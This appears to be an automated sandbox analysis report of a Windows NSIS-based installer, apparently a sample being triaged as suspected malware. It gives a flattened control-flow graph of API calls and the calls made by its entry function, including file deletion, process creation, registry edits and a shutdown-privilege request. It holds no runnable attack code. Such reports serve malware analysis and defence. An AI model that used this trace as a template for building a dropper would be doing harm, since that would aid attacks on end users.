CloseHandle 4266->4267 4267->4268 4270->4265 3756 401f7b 3757 402bce 17 API calls 3756->3757 3758 401f81 3757->3758 3759 4051fb 24 API calls 3758->3759 3760 401f8b 3759->3760 3761 405773 2 API calls 3760->3761 3762 401f91 3761->3762 3763 401fb2 CloseHandle 3762->3763 3767 4027bf 3762->3767 3771 406552 WaitForSingleObject 3762->3771 3763->3767 3766 401fa6 3768 401fb4 3766->3768 3769 401fab 3766->3769 3768->3763 3776 406032 wsprintfA 3769->3776 3772 40656c 3771->3772 3773 40657e GetExitCodeProcess 3772->3773 3774 406519 2 API calls 3772->3774 3773->3766 3775 406573 WaitForSingleObject 3774->3775 3775->3772 3776->3763 4271 401ffb 4272 402bce 17 API calls 4271->4272 4273 402002 4272->4273 4274 4064dd 5 API calls 4273->4274 4275 402011 4274->4275 4276 402029 GlobalAlloc 4275->4276 4277 402091 4275->4277 4276->4277 4278 40203d 4276->4278 4279 4064dd 5 API calls 4278->4279 4280 402044 4279->4280 4281 
4064dd 5 API calls 4280->4281 4282 40204e 4281->4282 4282->4277 4286 406032 wsprintfA 4282->4286 4284 402085 4287 406032 wsprintfA 4284->4287 4286->4284 4287->4277 4288 4018fd 4289 401934 4288->4289 4290 402bce 17 API calls 4289->4290 4291 401939 4290->4291 4292 40589c 67 API calls 4291->4292 4293 401942 4292->4293 4294 401cfe 4295 402bac 17 API calls 4294->4295 4296 401d04 IsWindow 4295->4296 4297 401a0e 4296->4297 4298 401000 4299 401037 BeginPaint GetClientRect 4298->4299 4300 40100c DefWindowProcA 4298->4300 4301 4010f3 4299->4301 4303 401179 4300->4303 4304 401073 CreateBrushIndirect FillRect DeleteObject 4301->4304 4305 4010fc 4301->4305 4304->4301 4306 401102 CreateFontIndirectA 4305->4306 4307 401167 EndPaint 4305->4307 4306->4307 4308 401112 6 API calls 4306->4308 4307->4303 4308->4307 4309 401900 4310 402bce 17 API calls 4309->4310 4311 401907 4310->4311 4312 4057f0 MessageBoxIndirectA 4311->4312 4313 401910 4312->4313 4314 401502 4315 40150a 4314->4315 4317 40151d 4314->4317 4316 402bac 17 API calls 4315->4316 4316->4317 3059 403c84 3060 403dd7 3059->3060 3061 403c9c 3059->3061 3063 403e28 3060->3063 3064 403de8 GetDlgItem GetDlgItem 3060->3064 3061->3060 3062 403ca8 3061->3062 3066 403cb3 SetWindowPos 3062->3066 3067 403cc6 3062->3067 3065 403e82 3063->3065 3073 401389 2 API calls 3063->3073 3068 404158 18 API calls 3064->3068 3074 403dd2 3065->3074 3130 4041a4 3065->3130 3066->3067 3070 403ce3 3067->3070 3071 403ccb ShowWindow 3067->3071 3072 403e12 SetClassLongA 3068->3072 3075 403d05 3070->3075 3076 403ceb DestroyWindow 3070->3076 3071->3070 3077 40140b 2 API calls 3072->3077 3078 403e5a 3073->3078 3080 403d0a SetWindowLongA 3075->3080 3081 403d1b 3075->3081 3079 4040e1 3076->3079 3077->3063 3078->3065 3084 403e5e SendMessageA 3078->3084 3079->3074 3090 404112 ShowWindow 3079->3090 3080->3074 3082 403dc4 3081->3082 3083 403d27 GetDlgItem 3081->3083 3152 4041bf 3082->3152 3087 403d57 3083->3087 3088 403d3a SendMessageA IsWindowEnabled 3083->3088 
3084->3074 3085 40140b 2 API calls 3097 403e94 3085->3097 3086 4040e3 DestroyWindow KiUserCallbackDispatcher 3086->3079 3092 403d64 3087->3092 3093 403dab SendMessageA 3087->3093 3094 403d77 3087->3094 3104 403d5c 3087->3104 3088->3074 3088->3087 3090->3074 3091 406167 17 API calls 3091->3097 3092->3093 3092->3104 3093->3082 3098 403d94 3094->3098 3099 403d7f 3094->3099 3096 403d92 3096->3082 3097->3074 3097->3085 3097->3086 3097->3091 3100 404158 18 API calls 3097->3100 3121 404023 DestroyWindow 3097->3121 3133 404158 3097->3133 3101 40140b 2 API calls 3098->3101 3146 40140b 3099->3146 3100->3097 3103 403d9b 3101->3103 3103->3082 3103->3104 3149 404131 3104->3149 3106 403f0f GetDlgItem 3107 403f24 3106->3107 3108 403f2c ShowWindow KiUserCallbackDispatcher 3106->3108 3107->3108 3136 40417a KiUserCallbackDispatcher 3108->3136 3110 403f56 EnableWindow 3115 403f6a 3110->3115 3111 403f6f GetSystemMenu EnableMenuItem SendMessageA 3112 403f9f SendMessageA 3111->3112 3111->3115 3112->3115 3115->3111 3137 40418d SendMessageA 3115->3137 3138 403c65 3115->3138 3141 4060d4 lstrcpynA 3115->3141 3117 403fce lstrlenA 3118 406167 17 API calls 3117->3118 3119 403fdf SetWindowTextA 3118->3119 3142 401389 3119->3142 3121->3079 3122 40403d CreateDialogParamA 3121->3122 3122->3079 3123 404070 3122->3123 3124 404158 18 API calls 3123->3124 3125 40407b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3124->3125 3126 401389 2 API calls 3125->3126 3127 4040c1 3126->3127 3127->3074 3128 4040c9 ShowWindow 3127->3128 3129 4041a4 SendMessageA 3128->3129 3129->3079 3131 4041bc 3130->3131 3132 4041ad SendMessageA 3130->3132 3131->3097 3132->3131 3134 406167 17 API calls 3133->3134 3135 404163 SetDlgItemTextA 3134->3135 3135->3106 3136->3110 3137->3115 3139 406167 17 API calls 3138->3139 3140 403c73 SetWindowTextA 3139->3140 3140->3115 3141->3117 3144 401390 3142->3144 3143 4013fe 3143->3097 3144->3143 3145 4013cb MulDiv SendMessageA 3144->3145 3145->3144 3147 401389 2 API calls 3146->3147 
3148 401420 3147->3148 3148->3104 3150 404138 3149->3150 3151 40413e SendMessageA 3149->3151 3150->3151 3151->3096 3153 404282 3152->3153 3154 4041d7 GetWindowLongA 3152->3154 3153->3074 3154->3153 3155 4041ec 3154->3155 3155->3153 3156 404219 GetSysColor 3155->3156 3157 40421c 3155->3157 3156->3157 3158 404222 SetTextColor 3157->3158 3159 40422c SetBkMode 3157->3159 3158->3159 3160 404244 GetSysColor 3159->3160 3161 40424a 3159->3161 3160->3161 3162 404251 SetBkColor 3161->3162 3163 40425b 3161->3163 3162->3163 3163->3153 3164 404275 CreateBrushIndirect 3163->3164 3165 40426e DeleteObject 3163->3165 3164->3153 3165->3164 4318 402604 4319 402bce 17 API calls 4318->4319 4320 40260b 4319->4320 4323 405c6d GetFileAttributesA CreateFileA 4320->4323 4322 402617 4323->4322 4324 401b87 4325 401b94 4324->4325 4326 401bd8 4324->4326 4331 401bab 4325->4331 4334 401c1c 4325->4334 4327 401c01 GlobalAlloc 4326->4327 4328 401bdc 4326->4328 4330 406167 17 API calls 4327->4330 4336 402387 4328->4336 4345 4060d4 lstrcpynA 4328->4345 4329 406167 17 API calls 4332 402381 4329->4332 4330->4334 4343 4060d4 lstrcpynA 4331->4343 4339 4057f0 MessageBoxIndirectA 4332->4339 4334->4329 4334->4336 4337 401bee GlobalFree 4337->4336 4338 401bba 4344 4060d4 lstrcpynA 4338->4344 4339->4336 4341 401bc9 4346 4060d4 lstrcpynA 4341->4346 4343->4338 4344->4341 4345->4337 4346->4336 3545 402588 3557 402c0e 3545->3557 3548 402bac 17 API calls 3549 40259b 3548->3549 3550 4025a9 3549->3550 3555 4027bf 3549->3555 3551 4025c2 RegEnumValueA 3550->3551 3552 4025b6 RegEnumKeyA 3550->3552 3553 4025de RegCloseKey 3551->3553 3554 4025d7 3551->3554 3552->3553 3553->3555 3554->3553 3558 402bce 17 API calls 3557->3558 3559 402c25 3558->3559 3560 405f5a RegOpenKeyExA 3559->3560 3561 402592 3560->3561 3561->3548 3562 40380d 3563 403825 3562->3563 3564 403817 CloseHandle 3562->3564 3569 403852 3563->3569 3564->3563 3570 403860 3569->3570 3571 40382a 3570->3571 3572 403865 FreeLibrary GlobalFree 3570->3572 3573 40589c 
3571->3573 3572->3571 3572->3572 3574 405b5a 18 API calls 3573->3574 3575 4058bc 3574->3575 3576 4058c4 DeleteFileA 3575->3576 3577 4058db 3575->3577 3605 403836 3576->3605 3578 405a09 3577->3578 3610 4060d4 lstrcpynA 3577->3610 3583 406448 2 API calls 3578->3583 3578->3605 3580 405901 3581 405914 3580->3581 3582 405907 lstrcatA 3580->3582 3585 405ab3 2 API calls 3581->3585 3584 40591a 3582->3584 3586 405a2d 3583->3586 3587 405928 lstrcatA 3584->3587 3588 405933 lstrlenA FindFirstFileA 3584->3588 3585->3584 3589 405a6c 3 API calls 3586->3589 3586->3605 3587->3588 3588->3578 3593 405957 3588->3593 3591 405a37 3589->3591 3590 405a97 CharNextA 3590->3593 3592 405854 5 API calls 3591->3592 3594 405a43 3592->3594 3593->3590 3598 4059e8 FindNextFileA 3593->3598 3606 40589c 60 API calls 3593->3606 3607 4051fb 24 API calls 3593->3607 3608 4051fb 24 API calls 3593->3608 3609 405eb3 36 API calls 3593->3609 3611 4060d4 lstrcpynA 3593->3611 3612 405854 3593->3612 3595 405a47 3594->3595 3596 405a5d 3594->3596 3601 4051fb 24 API calls 3595->3601 3595->3605 3597 4051fb 24 API calls 3596->3597 3597->3605 3598->3593 3600 405a00 FindClose 3598->3600 3600->3578 3602 405a54 3601->3602 3604 405eb3 36 API calls 3602->3604 3604->3605 3606->3593 3607->3598 3608->3593 3609->3593 3610->3580 3611->3593 3620 405c48 GetFileAttributesA 3612->3620 3615 405881 3615->3593 3616 405877 DeleteFileA 3618 40587d 3616->3618 3617 40586f RemoveDirectoryA 3617->3618 3618->3615 3619 40588d SetFileAttributesA 3618->3619 3619->3615 3621 405860 3620->3621 3622 405c5a SetFileAttributesA 3620->3622 3621->3615 3621->3616 3621->3617 3622->3621 4347 40428e lstrcpynA lstrlenA 4348 401490 4349 4051fb 24 API calls 4348->4349 4350 401497 4349->4350 3653 402516 3654 402c0e 17 API calls 3653->3654 3655 402520 3654->3655 3656 402bce 17 API calls 3655->3656 3657 402529 3656->3657 3658 402533 RegQueryValueExA 3657->3658 3662 4027bf 3657->3662 3659 402553 3658->3659 3663 402559 RegCloseKey 3658->3663 3659->3663 3664 406032 
wsprintfA 3659->3664 3663->3662 3664->3663 3801 40239c 3802 4023a4 3801->3802 3804 4023aa 3801->3804 3803 402bce 17 API calls 3802->3803 3803->3804 3805 4023ba 3804->3805 3806 402bce 17 API calls 3804->3806 3807 4023c8 3805->3807 3808 402bce 17 API calls 3805->3808 3806->3805 3809 402bce 17 API calls 3807->3809 3808->3807 3810 4023d1 WritePrivateProfileStringA 3809->3810 3811 40159d 3812 402bce 17 API calls 3811->3812 3813 4015a4 SetFileAttributesA 3812->3813 3814 4015b6 3813->3814 4351 40149d 4352 402387 4351->4352 4353 4014ab PostQuitMessage 4351->4353 4353->4352 4354 40209d 4355 40215d 4354->4355 4356 4020af 4354->4356 4358 401423 24 API calls 4355->4358 4357 402bce 17 API calls 4356->4357 4359 4020b6 4357->4359 4365 4022e2 4358->4365 4360 402bce 17 API calls 4359->4360 4361 4020bf 4360->4361 4362 4020d4 LoadLibraryExA 4361->4362 4363 4020c7 GetModuleHandleA 4361->4363 4362->4355 4364 4020e4 GetProcAddress 4362->4364 4363->4362 4363->4364 4366 402130 4364->4366 4367 4020f3 4364->4367 4368 4051fb 24 API calls 4366->4368 4369 401423 24 API calls 4367->4369 4370 402103 4367->4370 4368->4370 4369->4370 4370->4365 4371 402151 FreeLibrary 4370->4371 4371->4365 4372 401a1e 4373 402bce 17 API calls 4372->4373 4374 401a27 ExpandEnvironmentStringsA 4373->4374 4375 401a3b 4374->4375 4377 401a4e 4374->4377 4376 401a40 lstrcmpA 4375->4376 4375->4377 4376->4377 3815 40171f 3816 402bce 17 API calls 3815->3816 3817 401726 SearchPathA 3816->3817 3818 401741 3817->3818 4383 401d1f 4384 402bac 17 API calls 4383->4384 4385 401d26 4384->4385 4386 402bac 17 API calls 4385->4386 4387 401d32 GetDlgItem 4386->4387 4388 402620 4387->4388 4389 402421 4390 402453 4389->4390 4391 402428 4389->4391 4392 402bce 17 API calls 4390->4392 4393 402c0e 17 API calls 4391->4393 4395 40245a 4392->4395 4394 40242f 4393->4394 4397 402bce 17 API calls 4394->4397 4399 402467 4394->4399 4400 402c8c 4395->4400 4398 402440 RegDeleteValueA RegCloseKey 4397->4398 4398->4399 4401 402c98 4400->4401 4402 402c9f 
4400->4402 4401->4399 4402->4401 4404 402cd0 4402->4404 4405 405f5a RegOpenKeyExA 4404->4405 4407 402cfe 4405->4407 4406 402da8 4406->4401 4407->4406 4408 402d0e RegEnumValueA 4407->4408 4412 402d31 4407->4412 4409 402d98 RegCloseKey 4408->4409 4408->4412 4409->4406 4410 402d6d RegEnumKeyA 4411 402d76 RegCloseKey 4410->4411 4410->4412 4413 4064dd 5 API calls 4411->4413 4412->4409 4412->4410 4412->4411 4414 402cd0 6 API calls 4412->4414 4415 402d86 4413->4415 4414->4412 4415->4406 4416 402d8a RegDeleteKeyA 4415->4416 4416->4406 4417 4027a1 4418 402bce 17 API calls 4417->4418 4419 4027a8 FindFirstFileA 4418->4419 4420 4027cb 4419->4420 4424 4027bb 4419->4424 4422 4027d2 4420->4422 4425 406032 wsprintfA 4420->4425 4426 4060d4 lstrcpynA 4422->4426 4425->4422 4426->4424 4427 4045a3 4428 4045b3 4427->4428 4429 4045d9 4427->4429 4430 404158 18 API calls 4428->4430 4431 4041bf 8 API calls 4429->4431 4432 4045c0 SetDlgItemTextA 4430->4432 4433 4045e5 4431->4433 4432->4429 3177 403325 SetErrorMode GetVersion 3178 403366 3177->3178 3179 40336c 3177->3179 3180 4064dd 5 API calls 3178->3180 3267 40646f GetSystemDirectoryA 3179->3267 3180->3179 3182 403382 lstrlenA 3182->3179 3183 403391 3182->3183 3270 4064dd GetModuleHandleA 3183->3270 3186 4064dd 5 API calls 3187 40339f 3186->3187 3188 4064dd 5 API calls 3187->3188 3189 4033ab #17 OleInitialize SHGetFileInfoA 3188->3189 3276 4060d4 lstrcpynA 3189->3276 3192 4033f7 GetCommandLineA 3277 4060d4 lstrcpynA 3192->3277 3194 403409 3195 405a97 CharNextA 3194->3195 3196 403432 CharNextA 3195->3196 3199 403442 3196->3199 3197 40350c 3198 40351f GetTempPathA 3197->3198 3278 4032f4 3198->3278 3199->3197 3199->3199 3204 405a97 CharNextA 3199->3204 3208 40350e 3199->3208 3201 403537 3202 403591 DeleteFileA 3201->3202 3203 40353b GetWindowsDirectoryA lstrcatA 3201->3203 3288 402ea1 GetTickCount GetModuleFileNameA 3202->3288 3205 4032f4 12 API calls 3203->3205 3204->3199 3207 403557 3205->3207 3207->3202 3211 40355b GetTempPathA lstrcatA 
SetEnvironmentVariableA SetEnvironmentVariableA 3207->3211 3372 4060d4 lstrcpynA 3208->3372 3209 4035a5 3212 40363f ExitProcess CoUninitialize 3209->3212 3216 40362b 3209->3216 3217 405a97 CharNextA 3209->3217 3215 4032f4 12 API calls 3211->3215 3213 403773 3212->3213 3214 403655 3212->3214 3219 4037f5 ExitProcess 3213->3219 3220 40377b GetCurrentProcess OpenProcessToken 3213->3220 3389 4057f0 3214->3389 3221 403589 3215->3221 3316 4038e7 3216->3316 3224 4035c0 3217->3224 3227 4037c6 3220->3227 3228 403796 LookupPrivilegeValueA AdjustTokenPrivileges 3220->3228 3221->3202 3221->3212 3223 40363b 3223->3212 3230 403606 3224->3230 3231 40366b 3224->3231 3229 4064dd 5 API calls 3227->3229 3228->3227 3232 4037cd 3229->3232 3373 405b5a 3230->3373 3393 40575b 3231->3393 3235 4037e2 ExitWindowsEx 3232->3235 3236 4037ee 3232->3236 3235->3219 3235->3236 3239 40140b 2 API calls 3236->3239 3239->3219 3240 403681 lstrcatA 3241 40368c lstrcatA lstrcmpiA 3240->3241 3241->3212 3242 4036a8 3241->3242 3244 4036b4 3242->3244 3245 4036ad 3242->3245 3401 40573e CreateDirectoryA 3244->3401 3396 4056c1 CreateDirectoryA 3245->3396 3246 403620 3388 4060d4 lstrcpynA 3246->3388 3250 4036b9 SetCurrentDirectoryA 3252 4036d3 3250->3252 3253 4036c8 3250->3253 3405 4060d4 lstrcpynA 3252->3405 3404 4060d4 lstrcpynA 3253->3404 3256 406167 17 API calls 3257 403712 DeleteFileA 3256->3257 3258 40371f CopyFileA 3257->3258 3264 4036e1 3257->3264 3258->3264 3259 403767 3260 405eb3 36 API calls 3259->3260 3262 40376e 3260->3262 3262->3212 3263 406167 17 API calls 3263->3264 3264->3256 3264->3259 3264->3263 3266 403753 CloseHandle 3264->3266 3406 405eb3 MoveFileExA 3264->3406 3410 405773 CreateProcessA 3264->3410 3266->3264 3268 406491 wsprintfA LoadLibraryExA 3267->3268 3268->3182 3271 406503 GetProcAddress 3270->3271 3272 4064f9 3270->3272 3274 403398 3271->3274 3273 40646f 3 API calls 3272->3273 3275 4064ff 3273->3275 3274->3186 3275->3271 3275->3274 3276->3192 3277->3194 3279 4063af 5 API calls 
3278->3279 3280 403300 3279->3280 3281 40330a 3280->3281 3413 405a6c lstrlenA CharPrevA 3280->3413 3281->3201 3284 40573e 2 API calls 3285 403318 3284->3285 3416 405c9c 3285->3416 3420 405c6d GetFileAttributesA CreateFileA 3288->3420 3290 402ee1 3309 402ef1 3290->3309 3421 4060d4 lstrcpynA 3290->3421 3292 402f07 3422 405ab3 lstrlenA 3292->3422 3296 402f18 GetFileSize 3297 403012 3296->3297 3315 402f2f 3296->3315 3427 402e3d 3297->3427 3299 40301b 3301 40304b GlobalAlloc 3299->3301 3299->3309 3462 4032dd SetFilePointer 3299->3462 3438 4032dd SetFilePointer 3301->3438 3302 40307e 3306 402e3d 6 API calls 3302->3306 3305 403066 3439 4030d8 3305->3439 3306->3309 3307 403034 3310 4032c7 ReadFile 3307->3310 3309->3209 3312 40303f 3310->3312 3311 402e3d 6 API calls 3311->3315 3312->3301 3312->3309 3313 403072 3313->3309 3313->3313 3314 4030af SetFilePointer 3313->3314 3314->3309 3315->3297 3315->3302 3315->3309 3315->3311 3459 4032c7 3315->3459 3317 4064dd 5 API calls 3316->3317 3318 4038fb 3317->3318 3319 403901 3318->3319 3320 403913 3318->3320 3498 406032 wsprintfA 3319->3498 3321 405fbb 3 API calls 3320->3321 3323 40393e 3321->3323 3324 40395c lstrcatA 3323->3324 3326 405fbb 3 API calls 3323->3326 3325 403911 3324->3325 3483 403bac 3325->3483 3326->3324 3329 405b5a 18 API calls 3330 40398e 3329->3330 3331 403a17 3330->3331 3333 405fbb 3 API calls 3330->3333 3332 405b5a 18 API calls 3331->3332 3334 403a1d 3332->3334 3335 4039ba 3333->3335 3336 403a2d LoadImageA 3334->3336 3337 406167 17 API calls 3334->3337 3335->3331 3340 4039d6 lstrlenA 3335->3340 3343 405a97 CharNextA 3335->3343 3338 403ad3 3336->3338 3339 403a54 RegisterClassA 3336->3339 3337->3336 3342 40140b 2 API calls 3338->3342 3341 403a8a SystemParametersInfoA CreateWindowExA 3339->3341 3371 403add 3339->3371 3344 4039e4 lstrcmpiA 3340->3344 3345 403a0a 3340->3345 3341->3338 3346 403ad9 3342->3346 3348 4039d4 3343->3348 3344->3345 3349 4039f4 GetFileAttributesA 3344->3349 3347 405a6c 3 API calls 3345->3347 
3350 403bac 18 API calls 3346->3350 3346->3371 3351 403a10 3347->3351 3348->3340 3352 403a00 3349->3352 3353 403aea 3350->3353 3499 4060d4 lstrcpynA 3351->3499 3352->3345 3355 405ab3 2 API calls 3352->3355 3356 403af6 ShowWindow 3353->3356 3357 403b79 3353->3357 3355->3345 3359 40646f 3 API calls 3356->3359 3491 4052cd OleInitialize 3357->3491 3361 403b0e 3359->3361 3360 403b7f 3362 403b83 3360->3362 3363 403b9b 3360->3363 3364 403b1c GetClassInfoA 3361->3364 3366 40646f 3 API calls 3361->3366 3369 40140b 2 API calls 3362->3369 3362->3371 3365 40140b 2 API calls 3363->3365 3367 403b30 GetClassInfoA RegisterClassA 3364->3367 3368 403b46 DialogBoxParamA 3364->3368 3365->3371 3366->3364 3367->3368 3370 40140b 2 API calls 3368->3370 3369->3371 3370->3371 3371->3223 3372->3198 3501 4060d4 lstrcpynA 3373->3501 3375 405b6b 3502 405b05 CharNextA CharNextA 3375->3502 3378 403611 3378->3212 3387 4060d4 lstrcpynA 3378->3387 3379 4063af 5 API calls 3385 405b81 3379->3385 3380 405bac lstrlenA 3381 405bb7 3380->3381 3380->3385 3383 405a6c 3 API calls 3381->3383 3384 405bbc GetFileAttributesA 3383->3384 3384->3378 3385->3378 3385->3380 3386 405ab3 2 API calls 3385->3386 3508 406448 FindFirstFileA 3385->3508 3386->3380 3387->3246 3388->3216 3390 405805 3389->3390 3391 403663 ExitProcess 3390->3391 3392 405819 MessageBoxIndirectA 3390->3392 3392->3391 3394 4064dd 5 API calls 3393->3394 3395 403670 lstrcatA 3394->3395 3395->3240 3395->3241 3397 405712 GetLastError 3396->3397 3398 4036b2 3396->3398 3397->3398 3399 405721 SetFileSecurityA 3397->3399 3398->3250 3399->3398 3400 405737 GetLastError 3399->3400 3400->3398 3402 405752 GetLastError 3401->3402 3403 40574e 3401->3403 3402->3403 3403->3250 3404->3252 3405->3264 3407 405ed4 3406->3407 3408 405ec7 3406->3408 3407->3264 3511 405d43 3408->3511 3411 4057b2 3410->3411 3412 4057a6 CloseHandle 3410->3412 3411->3264 3412->3411 3414 403312 3413->3414 3415 405a86 lstrcatA 3413->3415 3414->3284 3415->3414 3417 405ca7 GetTickCount 
GetTempFileNameA 3416->3417 3418 403323 3417->3418 3419 405cd4 3417->3419 3418->3201 3419->3417 3419->3418 3420->3290 3421->3292 3423 405ac0 3422->3423 3424 402f0d 3423->3424 3425 405ac5 CharPrevA 3423->3425 3426 4060d4 lstrcpynA 3424->3426 3425->3423 3425->3424 3426->3296 3428 402e46 3427->3428 3429 402e5e 3427->3429 3430 402e56 3428->3430 3431 402e4f DestroyWindow 3428->3431 3432 402e66 3429->3432 3433 402e6e GetTickCount 3429->3433 3430->3299 3431->3430 3463 406519 3432->3463 3435 402e7c CreateDialogParamA ShowWindow 3433->3435 3436 402e9f 3433->3436 3435->3436 3436->3299 3438->3305 3440 4030ee 3439->3440 3441 40311c 3440->3441 3480 4032dd SetFilePointer 3440->3480 3442 4032c7 ReadFile 3441->3442 3444 403127 3442->3444 3445 403260 3444->3445 3446 403139 GetTickCount 3444->3446 3448 40324a 3444->3448 3447 4032a2 3445->3447 3452 403264 3445->3452 3446->3448 3455 403165 3446->3455 3449 4032c7 ReadFile 3447->3449 3448->3313 3449->3448 3450 4032c7 ReadFile 3450->3455 3451 4032c7 ReadFile 3451->3452 3452->3448 3452->3451 3453 405d14 WriteFile 3452->3453 3453->3452 3454 4031bb GetTickCount 3454->3455 3455->3448 3455->3450 3455->3454 3456 4031e0 MulDiv wsprintfA 3455->3456 3478 405d14 WriteFile 3455->3478 3467 4051fb 3456->3467 3481 405ce5 ReadFile 3459->3481 3462->3307 3464 406536 PeekMessageA 3463->3464 3465 402e6c 3464->3465 3466 40652c DispatchMessageA 3464->3466 3465->3299 3466->3464 3468 405216 3467->3468 3477 4052b9 3467->3477 3469 405233 lstrlenA 3468->3469 3470 406167 17 API calls 3468->3470 3471 405241 lstrlenA 3469->3471 3472 40525c 3469->3472 3470->3469 3473 405253 lstrcatA 3471->3473 3471->3477 3474 405262 SetWindowTextA 3472->3474 3475 40526f 3472->3475 3473->3472 3474->3475 3476 405275 SendMessageA SendMessageA SendMessageA 3475->3476 3475->3477 3476->3477 3477->3455 3479 405d32 3478->3479 3479->3455 3480->3441 3482 4032da 3481->3482 3482->3315 3484 403bc0 3483->3484 3500 406032 wsprintfA 3484->3500 3486 403c31 3487 403c65 18 API calls 3486->3487 3489 

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNELBASE ref: 0040334A
                                                                                                    • GetVersion.KERNEL32 ref: 00403350
                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403383
                                                                                                    • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033BF
                                                                                                    • OleInitialize.OLE32(00000000), ref: 004033C6
                                                                                                    • SHGetFileInfoA.SHELL32(0079E528,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 004033E2
                                                                                                    • GetCommandLineA.KERNEL32(Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004033F7
                                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",00000020,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",00000000,?,00000007,00000009,0000000B), ref: 00403433
                                                                                                    • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403530
                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403541
                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040354D
                                                                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403561
                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403569
                                                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040357A
                                                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403582
                                                                                                    • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403596
                                                                                                      • Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
                                                                                                      • Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
                                                                                                      • Part of subcall function 004038E7: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skittaget\lektier,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,75923410), ref: 004039D7
                                                                                                      • Part of subcall function 004038E7: lstrcmpiA.KERNEL32(?,.exe), ref: 004039EA
                                                                                                      • Part of subcall function 004038E7: GetFileAttributesA.KERNEL32(: Completed), ref: 004039F5
                                                                                                      • Part of subcall function 004038E7: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\skittaget\lektier), ref: 00403A3E
                                                                                                      • Part of subcall function 004038E7: RegisterClassA.USER32(007A2700), ref: 00403A7B
                                                                                                    • ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 0040363F
                                                                                                      • Part of subcall function 0040380D: CloseHandle.KERNEL32(FFFFFFFF,00403644,?,?,00000007,00000009,0000000B), ref: 00403818
                                                                                                    • CoUninitialize.COMBASE(?,?,00000007,00000009,0000000B), ref: 00403644
                                                                                                    • ExitProcess.KERNEL32 ref: 00403665
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 00403782
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403789
                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037A1
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037C0
                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004037E4
                                                                                                    • ExitProcess.KERNEL32 ref: 00403807
                                                                                                      • Part of subcall function 004057F0: MessageBoxIndirectA.USER32(0040A218), ref: 0040584B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
